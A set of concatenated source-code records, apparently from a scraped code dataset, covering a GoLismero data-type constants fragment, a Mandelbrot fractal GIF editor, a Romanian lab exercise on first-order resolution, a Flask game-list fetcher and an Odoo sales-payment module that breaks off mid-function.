INFORMATION_PORTSCAN = 1304 # Portscan results\n INFORMATION_TRACEROUTE = 1305 # Traceroute results\n INFORMATION_GEOLOCATION = 1306 # Geographic location\n\n\n #----------------------------------------------------------------------\n\n data_type = Data.TYPE_INFORMATION\n information_type = INFORMATION_UNKNOWN\n","sub_path":"golismero/api/data/information/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"541713128","text":"# import some modules\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom itertools import cycle\nimport matplotlib.colors as clr\nimport matplotlib.colors\nfrom tkinter import *\nfrom matplotlib import animation\nfrom tkinter import colorchooser\nfrom numba import jit\n\ndef fractal(real_min, real_max, imaginary_min, imaginary_max, real_points, imaginary_points, max_iterations=200,\n max_infinity_number=4):\n image = np.zeros((realPoints, imaginaryPoints))\n real_part, imaginary_part = np.mgrid[real_min:real_max:(real_points * 1j),\n imaginary_min:imaginary_max:(imaginary_points * 1j)]\n\n complex_number = real_part + 1j * imaginary_part\n new_complex = np.zeros_like(complex_number)\n\n for i in range(max_iterations):\n new_complex = new_complex ** 2 + complex_number\n\n mask = (np.abs(new_complex) > max_infinity_number) & (image == 0)\n\n image[mask] = i\n\n new_complex[mask] = np.nan\n return -image.T\n\n\ndef init():\n return plt.gca()\n\n\ndef animation(i):\n if i > maxFrames // 2:\n plt.imshow(images[maxFrames // 2 - i], cmap='flag')\n print(i)\n return\n real_center = -0.793191078177363\n imaginary_center = 0.16093721735804\n\n zoom = (i / maxFrames * 2) ** 3 * maxZoom + 1\n scale = 1 / zoom\n new_real_min = (realMin - real_center) * scale + real_center\n new_imaginary_min = (imaginaryMin - imaginary_center) * scale + imaginary_center\n new_real_max = (realMax - real_center) * scale + real_center\n new_imaginary_max = (imaginaryMax - imaginary_center) * scale + imaginary_center\n\n image = fractal(new_real_min, new_real_max, new_imaginary_min, new_imaginary_max, realPoints, imaginaryPoints)\n plt.imshow(image, cmap='flag')\n images.append(image)\n print(i)\n return plt.gca()\n\n\ndef get_gif():\n anim = matplotlib.animation.FuncAnimation(figure, animation, init_func=init, frames=maxFrames, interval=50)\n anim.save('myGif.gif', writer=writer)\n\n\ndef get_picture():\n image = fractal(realMin, realMax, imaginaryMin, imaginaryMax, realPoints, imaginaryPoints, max_iterations,\n maxInfinityNumber)\n plt.xticks([])\n plt.yticks([])\n plt.imshow(image, cmap=cmap, interpolation='none')\n plt.show()\n\n\ndef update_frames(index):\n if index > maxFrames - 1:\n index = 0\n frame = gif_frames[index]\n index += 1\n label.configure(image=frame)\n label.after(50, update_frames, index)\n\n\ndef choose_color1():\n a = colorchooser.askcolor()[1]\n global color1\n color1 = a\n color_button.config(background=color1)\n\n global cmap\n\n colorpoints = [(1 - (1 - q) ** 4, c) for q, c in zip(np.linspace(0, 1, 20),\n cycle([color1, '#000000',\n color2, ]))]\n cmap = clr.LinearSegmentedColormap.from_list('mycmap',\n colorpoints, N=2048)\n\n\ndef choose_color2():\n a = colorchooser.askcolor()[1]\n global color2\n color2 = a\n color_button_two.config(background=color2)\n\n global cmap\n\n colorpoints = [(1 - (1 - q) ** 4, c) for q, c in zip(np.linspace(0, 1, 20),\n cycle([color1, '#000000',\n color2, ]))]\n cmap = clr.LinearSegmentedColormap.from_list('mycmap',\n colorpoints, N=2048)\n\n\ndef tkinter_window():\n global label\n global gif_frames\n\n root = Tk()\n width = root.winfo_screenwidth()\n height = root.winfo_screenheight()\n\n width = width // 2 - 200\n height = height // 2 - 200\n\n root.geometry('400x400+{}+{}'.format(width, height))\n root.title('Редактор скринсейвера')\n\n gif_frames = [\n PhotoImage(master=root, file=r'C:\\Users\\ukolo\\PycharmProjects\\fractlas\\mygif.gif', format='gif -index %i' % (i)) for i in range(maxFrames)]\n\n global color_button\n color_button = Button(text='Выбор цвета 2', command=choose_color1, master=root, background=color1)\n color_button.place(x=300, y=350)\n\n global color_button_two\n color_button_two = Button(text='Выбор цвета 1', command=choose_color2, master=root, background=color2)\n color_button_two.place(x=200, y=350)\n\n image_button = Button(text='Получить картинку', command=get_picture, master=root)\n image_button.place(x=10, y=350)\n\n gif_button = Button(text='Получить новую гиф', command=get_gif, master=root)\n gif_button.place(x=10, y=320)\n\n label = Label(root, width=380, height=300)\n label.place(x=10, y=0)\n root.after(0, update_frames, 0)\n root.mainloop()\n\n\n# Writer settings\nwriter = matplotlib.animation.ImageMagickWriter(fps=5, metadata=dict(artist='Me'), bitrate=1800)\n\n# Settings for image\nrealMin = -2.5\nrealMax = 1.5\nimaginaryMin = -2\nimaginaryMax = 2\nrealPoints = 1000\nimaginaryPoints = 1000\nmax_iterations = 200\nmaxInfinityNumber = 10\n\n# Animation settings\ncolor1 = '#309fcf'\ncolor2 = '#cf30bc'\n\ncolorpoints = [(1 - (1 - q) ** 4, c) for q, c in zip(np.linspace(0, 1, 20),\n cycle([color1, '#000000',\n color2, ]))]\ncmap = clr.LinearSegmentedColormap.from_list('mycmap',\n colorpoints, N=2048)\n\n\nfigure = plt.figure(figsize=(10, 10))\nmaxFrames = 30\nmaxZoom = 300\nimages = []\n\ntkinter_window()","sub_path":"graphic.py","file_name":"graphic.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"425710134","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Logica cu predicate (2). Rezoluție\n# - Andrei Olaru\n# - Tudor Berariu\n# \n\n# ## Scopul laboratorului\n# \n# Familiarizarea cu mecanismul rezoluției și cu strategiile de rezoluție.\n# \n# #### Resurse\n# \n# Cursul 5 de IA slides 34-44.\n\n# ### Cerința 1\n# \n# * din notebook-ul de la Laboratorul 5 faceți Download as → Python și salvați fișierul ca `Lab05.py`, în acest director.\n# * adăugați de asemenea în acest director fișierul `Lab05tester.py` (**descărcați din nou** de pe site).\n\n# In[1]:\n\n\n# TODO\nfrom Lab05tester import *\nfrom Lab05 import *\n\n\n# In[2]:\n\n\nfrom copy import deepcopy\nfrom functools import reduce\n\n# în această celulă se găsesc câteva funcții utilizate intern\n\ndummy = make_atom(\"P\")\n[and_name, or_name, neg_name] = [get_head(s) for s in [make_and(dummy, dummy), make_or(dummy, dummy), make_neg(dummy)]]\ndef pFail(message, f):\n print(message + \" <\" + str(f) + \">\")\n return False\ndef check_term(T):\n if is_constant(T):\n return (get_value(T) is not None) or pFail(\"The value of the constant is None\", T)\n if is_variable(T):\n return (get_name(T) is not None) or pFail(\"The name of the variable is None\", T)\n if is_function_call(T):\n return not [t for t in get_args(T) if not check_term(t)] and (get_head(T) is not None or pFail(\"Function is not callable\", T))\n return pFail(\"Term is not one of constant, variable or function call\", T)\ndef check_atom(A):\n if is_atom(A):\n return not [t for t in get_args(A) if not check_term(t)] and (get_head(A) is not None or pFail(\"Predicate name is None\", A))\n return pFail(\"Is not an atom\", A)\ndef check_sentence(S):\n if is_atom(S):\n return check_atom(S)\n if is_sentence(S):\n if get_head(S) in [and_name, or_name]:\n return (len(get_args(S)) >= 2 or pFail(\"Sentence has too few operands\", S)) and not [s for s in get_args(S) if not check_sentence(s)]\n if get_head(S) == neg_name:\n return (len(get_args(S)) == 1 or pFail(\"Negative sentence has not just 1 operand\", S)) and check_sentence(get_args(S)[0])\n return pFail(\"Not sentence or unknown type\", S)\n\ndef add_statement(kb, conclusion, *hypotheses):\n s = conclusion if not hypotheses else make_or(*([make_neg(s) for s in hypotheses] + [conclusion]))\n if check_sentence(s):\n kb.append(s)\n print(\"OK: Added statement \" + print_formula(s, True))\n return True\n print(\"-- FAILED CHECK: Sentence does not check out <\"+print_formula(s, True)+\"><\" + str(s) + \">\")\n return False\n\nvar_no = 0;\n\ndef assign_next_var_name():\n global var_no\n var_no += 1\n return \"v\" + str(var_no)\n\ndef gather_vars(S):\n return [get_name(S)] if is_variable(S) else [] if not has_args(S) else reduce(lambda res, a: res + gather_vars(a), get_args(S), [])\n\ndef make_unique_var_names(KB):\n global var_no\n var_no = 0\n return [substitute(S, {var: make_var(assign_next_var_name()) for var in gather_vars(S)}) for S in KB] \n \ndef print_KB(KB):\n print(\"KB now:\")\n for s in KB:\n print(\"\\t\\t\\t\" + print_formula(s, True))\n\n\n# In[3]:\n\n\n# KB 1\n# based on an example in Artificial Intelligence - A Modern Approach\nKB_America = []\n#0 Mr West is a US general\nadd_statement(KB_America, make_atom(\"USGeneral\", make_const(\"West\")))\n#1 General Awesome is also a US general\nadd_statement(KB_America, make_atom(\"USGeneral\", make_const(\"General_Awesome\")))\n#2 General Awesome is Awesome\nadd_statement(KB_America, make_atom(\"Awesome\", make_const(\"General_Awesome\")))\n#3 Nono is an enemy of America\nadd_statement(KB_America, make_atom(\"Enemy\", make_const(\"Nono\"), make_const(\"America\")))\n#4 M1 is a type of missile\nadd_statement(KB_America, make_atom(\"Missile\", make_const(\"M1\")))\n#5 Nono has the M1 missile\nadd_statement(KB_America, make_atom(\"Owns\", make_const(\"Nono\"), make_const(\"M1\")))\n\n#6 any US general is an American\nadd_statement(KB_America, make_atom(\"American\", make_var(\"x\")), make_atom(\"USGeneral\", make_var(\"x\")))\n#7 any missle is a weapon\nadd_statement(KB_America, make_atom(\"Weapon\", make_var(\"x\")), make_atom(\"Missile\", make_var(\"x\")))\n#8 if anyone owns a missile, it is General West that sold them that missile\nadd_statement(KB_America, make_atom(\"Sells\", make_const(\"West\"), make_var(\"y\"), make_var(\"x\")), make_atom(\"Owns\", make_var(\"x\"), make_var(\"y\")), make_atom(\"Missile\", make_var(\"y\")))\n#9 any American who sells weapons to a hostile is a criminal\nadd_statement(KB_America, make_atom(\"Criminal\", make_var(\"x\")), make_atom(\"Weapon\", make_var(\"y\")), make_atom(\"Sells\", make_var(\"x\"), make_var(\"y\"), make_var(\"z\")), make_atom(\"Hostile\", make_var(\"z\")), make_atom(\"American\", make_var(\"x\")))\n#10 any enemy of America is called a hostile\nadd_statement(KB_America, make_atom(\"Hostile\", make_var(\"x\")), make_atom(\"Enemy\", make_var(\"x\"), make_const(\"America\")))\n#11 America is awesome if at least an American is awesome\nadd_statement(KB_America, make_atom(\"Awesome\", make_const(\"America\")), make_atom(\"American\", make_var(\"x\")), make_atom(\"Awesome\", make_var(\"x\")))\n\nKB_America = make_unique_var_names(KB_America)\n\nprint_KB(KB_America)\n\n\n# In[4]:\n\n\n# KB 2\n# din cursul de IA\nKB_Faster = []\n\ndef the_greyhound():\n return make_const(\"Greg\")\n\n#0 horses are faster than dogs\nadd_statement(KB_Faster, make_atom(\"Faster\", make_var(\"x\"), make_var(\"y\")), make_atom(\"Horse\", make_var(\"x\")), make_atom(\"Dog\", make_var(\"y\")))\n#1 there is a greyhound that is faster than any rabbit\nadd_statement(KB_Faster, make_atom(\"Faster\", make_function_call(the_greyhound), make_var(\"z\")), make_atom(\"Rabbit\", make_var(\"z\")))\n#2 Harry is a horse\nadd_statement(KB_Faster, make_atom(\"Horse\", make_const(\"Harry\")))\n#3 Ralph is a rabbit\nadd_statement(KB_Faster, make_atom(\"Rabbit\", make_const(\"Ralph\")))\n#4 Greg is a greyhound\nadd_statement(KB_Faster, make_atom(\"Greyhound\", make_function_call(the_greyhound)))\n#5 A greyhound is a dog\nadd_statement(KB_Faster, make_atom(\"Dog\", make_var(\"y\")), make_atom(\"Greyhound\", make_var(\"y\")))\n#6 transitivity\nadd_statement(KB_Faster, make_atom(\"Faster\", make_var(\"x\"), make_var(\"z\")),\n make_atom(\"Faster\", make_var(\"x\"), make_var(\"y\")), make_atom(\"Faster\", make_var(\"y\"), make_var(\"z\")))\n\nKB_Faster = make_unique_var_names(KB_Faster)\n\nprint_KB(KB_Faster)\n\n\n# In[5]:\n\n\nKB_test = []\nadd_statement(KB_test, make_atom(\"Q\", make_var(\"x\")), make_atom(\"P\", make_var(\"x\")))\nadd_statement(KB_test, make_atom(\"P\", make_const(\"A\")))\n\nKB_test = make_unique_var_names(KB_test)\nprint_KB(KB_test)\n\n\n# ### Cerința 2\n# \n# * Implementați funcția `resolves`, care primește două clauze (literali sau disjuncții de literali) și întoarce `False` dacă cele două clauze nu rezolvă, altfel un tuplu care conține literalii care rezolvă, din cele două clauze, și substituția sub care aceștia rezolvă.\n\n# In[6]:\n\n\ndef is_positive_literal(L):\n return is_atom(L)\ndef is_negative_literal(L):\n global neg_name\n return get_head(L) == neg_name and is_positive_literal(get_args(L)[0])\ndef is_literal(L):\n return is_positive_literal(L) or is_negative_literal(L)\n\ndef resolves(C1, C2):\n #print(\"testing \" + print_formula(C1, True) + \" and \" + print_formula(C2, True))\n \n # întoarce un tuplu (literal-din-C1, literal-din-C2, substituție)\n # unde literal-din-C1 și literal-din-C2 unifică sub substituție\n literalsC1 = []\n if is_literal(C1):\n literalsC1.append(C1)\n else:\n literalsC1 = get_args(C1)\n \n literalsC2 = []\n if is_literal(C2):\n literalsC2.append(C2)\n else:\n literalsC2 = get_args(C2)\n \n result = ()\n for c1 in literalsC1:\n found = False\n subst = {}\n for c2 in literalsC2:\n if is_positive_literal(c1) and is_negative_literal(c2):\n subst = unify(c1, get_args(c2)[0])\n if subst != False:\n result = (c1, c2, subst)\n found = True\n break\n if is_negative_literal(c1) and is_positive_literal(c2):\n subst = unify(get_args(c1)[0], c2)\n if subst != False:\n result = (c1, c2, subst)\n found = True\n break\n\n # întoarce un tuplu (literal-din-C1, literal-din-C2, substituție)\n # unde literal-din-C1 și literal-din-C2 unifică sub substituție\n if found:\n return result\n return False\n\n# Test!\ntest_batch(4, globals())\n\n\n# In[7]:\n\n\n# prints a 5-tuple resolvent representation (see below)\ndef print_r(R):\n if R is None:\n print(\"no resolvent\")\n else:\n print(\"resolvent: \" + print_formula(R[2], True) + \"/\" + print_formula(R[3], True) + str(R[4]) + \"\\n\\t\\t in \" + print_formula(R[0], True) + \"\\n\\t\\t and \" + print_formula(R[1], True))\n\n\n# ### Cerința 3\n# \n# * implementați partea lipsă din funcția `solve_problem`, utilizând o strategie de rezoluție la alegere pentru a alege două clauze care rezolvă, și adăugând rezultatul pasului de rezoluție la baza de cunoștințe.\n\n# In[8]:\n\n\ndef solve_problem(hypotheses, conclusion):\n KB = hypotheses[:]\n KB = [make_neg(conclusion)] + KB # puteți adăuga și la sfârșit (în funcție de strategie)\n Effort = 50\n \n checked = []\n \n while Effort > 0:\n \n # Se calculează un rezolvent, ca tuplu (Clauza1, Clauza2, Literal-din-clauza1, Literal-din-clauza2, substituție)\n resolvent = None # TODO\n \n found = False\n for i in range(len(KB)):\n c1 = KB[i]\n \n if found == True:\n break\n \n for j in range(i+1, len(KB)):\n c2 = KB[j]\n \n if (c1, c2) not in checked:\n res = resolves(c1, c2)\n if (res != False):\n found = True\n \n resolvent = (c1, c2, res[0], res[1], res[2])\n checked.append((c1, c2))\n \n break\n\n print_r(resolvent)\n if resolvent is None:\n print(\"Failed. No resolving clauses. Effort left \" + str(Effort))\n return False\n \n # Se calculează noua clauză de adăugat și se adaugă la baza de cunoștințe\n # Clauza trebuie să fie în acest punct o listă de literali\n C = None # TODO\n \n C1_subst = substitute(resolvent[0], resolvent[4])\n C2_subst = substitute(resolvent[1], resolvent[4])\n\n literalsC1 = []\n if is_literal(C1_subst):\n literalsC1.append(C1_subst)\n else:\n literalsC1 = get_args(C1_subst)\n\n literalsC2 = []\n if is_literal(C2_subst):\n literalsC2.append(C2_subst)\n else:\n literalsC2 = get_args(C2_subst)\n\n # elimina literalii care au rezolvat sub subst\n literalsC1.remove(substitute(resolvent[2], resolvent[4]))\n literalsC2.remove(substitute(resolvent[3], resolvent[4]))\n \n C = literalsC1 + literalsC2\n \n # update KB\n if C == []:\n print(\"Done (effort left \" + str(Effort) + \")\")\n return True\n if len(C) == 1:\n C = C[0]\n else:\n C = make_or(*C)\n print(\"Added: \" + print_formula(C, True))\n KB = [C] + KB\n Effort -= 1\n\n print_KB(KB)\n print(\"Failed. Effort exhausted.\")\n \n \n#print_KB(KB_test)\n#solve_problem(deepcopy(KB_test), make_atom(\"Q\", make_const(\"A\")))\n\n#print_KB(KB_America)\n#solve_problem(deepcopy(KB_America), make_atom(\"Criminal\", make_const(\"West\")))\n\n#print_KB(KB_Faster)\nsolve_problem(deepcopy(KB_Faster), make_atom(\"Faster\", make_const(\"Harry\"), make_const(\"Ralph\")))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"IA/lab7/Lab06Skel.py","file_name":"Lab06Skel.py","file_ext":"py","file_size_in_byte":12030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"507435013","text":"from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor, wait, as_completed, ALL_COMPLETED\nfrom flask import render_template\nfrom collections import namedtuple\nimport threading\nimport requests\nimport json\n\n\ndef getAllGames():\n globalGamesArr = []\n pool = ThreadPoolExecutor(10)\n futures = []\n for x in range(1, 20):\n futures.append(pool.submit(requestWorker, (x)))\n\n wait(futures, timeout=None, return_when=ALL_COMPLETED)\n for future in as_completed(futures):\n result = future.result()\n globalGamesArr.append(result)\n\n def flatten(l): return [item for sublist in l for item in sublist]\n globalGamesArr = flatten(globalGamesArr)\n globalGamesArr.sort(key=lambda x: x.rating, reverse=True)\n return render_template('games.html', title='Home', gamesArr=globalGamesArr)\n\n\ndef requestWorker(pageIndex):\n url = \"https://api.rawg.io/api/games?page_size=500&page=\" + str(pageIndex)\n localGamesArr = []\n response = requests.request(\"GET\", url)\n games = json.loads(response.text)['results']\n for oneGame in games:\n localGamesArr.append(namedtuple(\n \"Game\", oneGame.keys())(*oneGame.values()))\n print(pageIndex)\n return localGamesArr\n","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"238959478","text":"# -*- coding: utf-8 -*-\r\n##############################################################################\r\n#\r\n# Copyright 2021 German Ponce Dominguez\r\n#\r\n##############################################################################\r\n\r\nfrom odoo import models, api, fields, _\r\nfrom odoo.exceptions import ValidationError, UserError\r\n\r\nfrom odoo.tools import float_is_zero, float_compare\r\nfrom itertools import groupby\r\n\r\n\r\nclass StockPicking(models.Model):\r\n _inherit = 'stock.picking'\r\n\r\n def button_validate(self):\r\n if self.sale_id:\r\n if self.sale_id.total_payment == False:\r\n if self.sale_id.payment_exception == False:\r\n raise UserError(_(\"Solo puede entregarse la Mercancia si el Pedido esta Pagado.\"))\r\n res = super(StockPicking, self).button_validate()\r\n return res\r\n\r\n\r\nclass SaleAdvancePaymentInv(models.TransientModel):\r\n _inherit = \"sale.advance.payment.inv\"\r\n\r\n def _prepare_invoice_values(self, order, name, amount, so_line):\r\n res = super(SaleAdvancePaymentInv, self)._prepare_invoice_values(order, name, amount, so_line)\r\n if 'invoice_line_ids' in res:\r\n invoice_lines = res['invoice_line_ids']\r\n invoice_lines_updated = []\r\n for invline in invoice_lines:\r\n line_vals = invline[2]\r\n line_vals.update({'order_to_global_id': order.id})\r\n invoice_lines_updated.append((0,0,line_vals))\r\n return res\r\n\r\n\r\nclass ResCompany(models.Model):\r\n _name = 'res.company'\r\n _inherit ='res.company'\r\n\r\n account_sale_payments = fields.Many2one('account.account', 'Cuenta Puente Registro de Pagos')\r\n\r\nclass AccountInvoiceLine(models.Model):\r\n _name = 'account.move.line'\r\n _inherit ='account.move.line'\r\n\r\n order_to_global_id = fields.Many2one('sale.order','Pedido Origen', copy=False)\r\n re_invoiced = fields.Boolean('Refacturación', copy=False)\r\n\r\n\r\n\r\nclass SaleOrderLine(models.Model):\r\n _name = 'sale.order.line'\r\n _inherit ='sale.order.line'\r\n\r\n\r\n @api.depends('invoice_lines.move_id.state', 'invoice_lines.quantity', 'untaxed_amount_to_invoice')\r\n def _get_invoice_qty(self):\r\n \"\"\"\r\n Compute the quantity invoiced. If case of a refund, the quantity invoiced is decreased. Note\r\n that this is the case only if the refund is generated from the SO and that is intentional: if\r\n a refund made would automatically decrease the invoiced quantity, then there is a risk of reinvoicing\r\n it automatically, which may not be wanted at all. That's why the refund has to be created from the SO\r\n \"\"\"\r\n for line in self:\r\n qty_invoiced = 0.0\r\n for invoice_line in line.invoice_lines:\r\n if invoice_line.move_id.state != 'cancel':\r\n if invoice_line.move_id.move_type == 'out_invoice':\r\n if not invoice_line.re_invoiced:\r\n qty_invoiced += invoice_line.product_uom_id._compute_quantity(invoice_line.quantity, line.product_uom)\r\n elif invoice_line.move_id.move_type == 'out_refund':\r\n if not line.is_downpayment or line.untaxed_amount_to_invoice == 0 :\r\n if not invoice_line.re_invoiced:\r\n qty_invoiced -= invoice_line.product_uom_id._compute_quantity(invoice_line.quantity, line.product_uom)\r\n line.qty_invoiced = qty_invoiced\r\n\r\n\r\n # @api.model\r\n # def create(self, vals):\r\n # if 'company_id' in vals:\r\n # self = self.with_company(vals['company_id'])\r\n # if 'name' not in vals or 'product_id' not in vals:\r\n # return True\r\n # if vals.get('name',False) == False and vals.get('product_id',False) == False:\r\n # return True\r\n # result = super(SaleOrderLine, self).create(vals)\r\n # return result\r\n\r\nclass sale_order(models.Model):\r\n _inherit = 'sale.order'\r\n\r\n @api.depends('state', 'amount_payment', 'total_payment')\r\n def _get_payments(self):\r\n\r\n for order in self:\r\n payment_count = 0\r\n if order.payments_apply_ids:\r\n for pay in order.payments_apply_ids:\r\n payment_count += 1\r\n order.update({\r\n 'payment_count': payment_count,\r\n })\r\n\r\n @api.depends('state', 'amount_payment', 'total_payment')\r\n def _get_pending_amount(self):\r\n\r\n for order in self:\r\n order_total = order.amount_total\r\n amount_pending = order_total - order.amount_payment\r\n if amount_pending < 0.0:\r\n amount_pending = 0.0\r\n order.update({\r\n 'amount_pending': amount_pending,\r\n 'amount_total_order': order_total,\r\n })\r\n\r\n\r\n amount_payment = fields.Float('Importe Pagado', copy=False)\r\n total_payment = fields.Boolean('Pagado', copy=False)\r\n \r\n payment_exception = fields.Boolean('Excepcion Pago', copy=False)\r\n\r\n amount_pending = fields.Float('Importe Pendiente ', compute='_get_pending_amount', store=True, digits=(14,4))\r\n\r\n amount_total_order = fields.Float('Importe Total ', compute='_get_pending_amount', store=True, digits=(14,4))\r\n \r\n\r\n payment_count = fields.Integer(string='# of Pagos', compute='_get_payments', readonly=True)\r\n\r\n # product_on_id = fields.Many2one('product.product','Producto', required=False,)\r\n # product_qty = fields.Integer('Cantidad', default=1)\r\n\r\n product_on_read = fields.Char('Lectura Codigo Barras', required=False, help=\"\"\"Ingresa el Codigo del Producto Automaticamente se Agregara como linea tomando El precio del producto y su unidad de Medida\r\n Podemos Agregar los Siguientes Comodines:\r\n - Si queremos agregar el Producto y la Cantidad a la Vez ponemos el Codigo del Producto + Cantidad, es importante poner el simbolo + despues del Producto'\"\"\" )\r\n\r\n easy_refund = fields.Float('Cambio', copy=False)\r\n\r\n re_invoiced = fields.Boolean('Refacturado', copy=False)\r\n\r\n user_payment_register_id = fields.Many2one('res.users','Cajero')\r\n\r\n invoice_global_ids = fields.Many2many('account.move',\r\n 'account_invoice_sale_rel', 'sale_id', 'invoice_id',\r\n string='Facturas', copy=False)\r\n\r\n ### Modulo Original ##\r\n payments_apply_ids = fields.One2many('account.payment', 'sale_order_id', 'Pagos aplicados')\r\n adv_payment_ids = fields.Many2many('account.payment', string=\"Pagos Relacionados\", copy=False)\r\n\r\n def _create_invoices(self, grouped=False, final=False, date=None):\r\n res = super(sale_order, self)._create_invoices(grouped=grouped, final=final, date=date)\r\n if res:\r\n for inv in res:\r\n for line in inv.invoice_line_ids:\r\n line.order_to_global_id = self.id\r\n return res\r\n\r\n def action_view_adv_payments(self):\r\n action = self.env.ref('account.action_account_payments').read()[0]\r\n action['domain'] = [('id', 'in', self.adv_payment_ids.ids)] if self.adv_payment_ids.ids else []\r\n action['context'] = {'create': 0}\r\n return action\r\n\r\n def btn_advance_payment(self):\r\n cus_ctx = {}\r\n if self.total_payment:\r\n raise UserError(_(\"El Pedido ya se encuentra en estado Pagado\"))\r\n if self.state not in ('sale','done'):\r\n raise UserError(_(\"Solo se pueden realizar pagos en los estados:\\n* Pedido Venta\\n* Hecho\"))\r\n amount_residual = self.amount_total-self.amount_payment\r\n cus_ctx.update({'default_amount': amount_residual})\r\n\r\n\r\n cus_ctx.update({'default_payment_type': 'inbound',\r\n 'default_partner_type': 'customer',\r\n 'search_default_inbound_filter': 1,\r\n 'res_partner_search_mode': 'customer',\r\n 'default_partner_id': self.partner_id.id,\r\n 'default_communication': self.name,\r\n 'default_sale_order_id': self.id,\r\n 'default_ref': self.name,\r\n 'active_ids':[],\r\n 'active_model':self._name,\r\n 'active_id':self.id,\r\n 'default_currency_id': self.currency_id.id})\r\n ctx = self._context.copy()\r\n ctx.update(cus_ctx)\r\n return {\r\n 'name': _('Pago Avanzado'),\r\n 'res_model': 'account.payment',\r\n 'view_mode': 'form',\r\n 'view_id': self.env.ref('fx_sale_advance_payment.view_sale_advance_account_payment_form').id,\r\n 'target': 'new',\r\n 'type': 'ir.actions.act_window',\r\n 'context': ctx\r\n }\r\n\r\n\r\n def action_cancel(self):\r\n for rec in self:\r\n payment_ids = self.env['account.payment'].sudo().search([('sale_order_id','=',rec.id)])\r\n if payment_ids:\r\n for payment in payment_ids:\r\n if payment.state not in ( 'draft','cancel' ):\r\n raise UserError(_(\"No puedes cancelar el Pedido, primero debes cancelar los Pagos Relacionados.\"))\r\n res = super(sale_order, self).action_cancel()\r\n for rec in self:\r\n rec.write({'total_payment':False,'amount_payment': 0.0})\r\n return res\r\n\r\n @api.onchange('partner_id', 'product_on_read', 'order_line','pricelist_id')\r\n def on_change_load_products(self):\r\n product_obj = self.env['product.product']\r\n salesman_obj = self.env['res.users']\r\n partner_obj = self.env['res.partner']\r\n partner = partner_obj.browse(self.partner_id)\r\n lines = [x.id for x in self.order_line]\r\n if not self.product_on_read:\r\n return {}\r\n\r\n qty_product = 1\r\n\r\n if self.product_on_read:\r\n if '+' in self.product_on_read:\r\n try:\r\n product_on_read = self.product_on_read.split(\"+\")\r\n qty_product_str = product_on_read[1]\r\n qty_product = float(qty_product_str)\r\n\r\n except:\r\n raise UserError(_(\"Error!\\nLa Informacion Introducida Contiene Errores. Verifique que el orden de la informacion sea como los siguientes ejemplos:\\\r\n \\n -[Cantidad+CodigoProducto]\"))\r\n\r\n product_on_read = self.product_on_read.split(\"+\")\r\n default_code = product_on_read[0]\r\n if len(default_code) > 12:\r\n default_code = default_code[0:12]\r\n # product_search = product_obj.search([('default_code','=',default_code)])\r\n self.env.cr.execute(\"\"\"\r\n select id from product_product where UPPER(default_code) = %s;\r\n \"\"\", (default_code.upper(),))\r\n cr_res = self.env.cr.fetchall()\r\n product_search = [x[0] for x in cr_res]\r\n if not product_search:\r\n self.env.cr.execute(\"\"\"\r\n select id from product_product where UPPER(barcode) like %s;\r\n \"\"\", ('%'+default_code.upper()+'%',))\r\n cr_res = self.env.cr.fetchall()\r\n product_search = [x[0] for x in cr_res]\r\n if not product_search:\r\n raise UserError(_(\"Error!\\nEl codigo [%s] no coincide con ninguna referencia de Producto.\" % default_code))\r\n\r\n product_id = product_search[0]\r\n product_br = product_obj.browse(product_search[0])\r\n if product_br.default_code:\r\n product_name = '['+product_br.default_code +']'+product_br.name\r\n else:\r\n product_name = product_br.name\r\n if product_br.property_account_income_id:\r\n account_id = product_br.property_account_income_id.id\r\n else:\r\n account_id = product_br.categ_id.property_account_income_categ_id.id\r\n # price = product_br.lst_price\r\n sale_order_line = self.env['sale.order.line']\r\n\r\n product_br_with_ctx = product_br.with_context(pricelist=self.pricelist_id.id)\r\n if self.pricelist_id and self.partner_id:\r\n # price = self.env['account.tax']._fix_tax_included_price(sale_order_line._get_display_price(product_br), product_br.taxes_id, [_w for _w in product_br.taxes_id] )\r\n price = product_br_with_ctx.price\r\n else:\r\n price = product_br.lst_price\r\n taxes_list = [_w.id for _w in product_br.taxes_id]\r\n\r\n if product_id:\r\n xline = (0,0,{\r\n 'product_id': product_id,\r\n 'name': product_name,\r\n 'tax_id': [(6, 0, taxes_list )],\r\n 'product_uom_qty': int(qty_product),\r\n 'price_unit': price,\r\n 'product_uom': product_br.uom_id.id,\r\n # 'account_id': account_id,\r\n })\r\n lines.append(xline)\r\n self.simple_add_product(product_id, int(qty_product))\r\n # print (\"######### lines >>>>>>>>>>>>>> \", lines)\r\n # self.update({'order_line': lines})\r\n \r\n self.product_on_read = False\r\n #self.recalculate_prices()\r\n\r\n def simple_add_product(self, product_id, qty=1.0):\r\n corresponding_line = self.order_line.filtered(\r\n lambda x: x.product_id.id == product_id)\r\n if corresponding_line:\r\n for cpline in corresponding_line:\r\n corresponding_line.product_uom_qty += qty\r\n break\r\n else:\r\n line = self.order_line.new({\r\n 'product_id': product_id,\r\n 'product_uom_qty': qty,\r\n 'order_id': self.id,\r\n })\r\n line.product_id_change()\r\n return True\r\n\r\n def on_barcode_scanned(self, barcode):\r\n product = self.env[\r\n 'product.product'].search([('barcode', '=', barcode)], limit=1)\r\n if product:\r\n self._add_product(product)\r\n else:\r\n product = self.env[\r\n 'product.product'].search([('default_code', '=', barcode)], limi=1)\r\n if product:\r\n self._add_product(product)\r\n else:\r\n return {'warning': {\r\n 'title': _('Error'),\r\n 'message': _(\r\n 'El codigo de barras o referencia \"%(barcode)s\" no'\r\n ' corresponde con ningun registro en la Base de Datos.') % {'barcode': barcode}\r\n 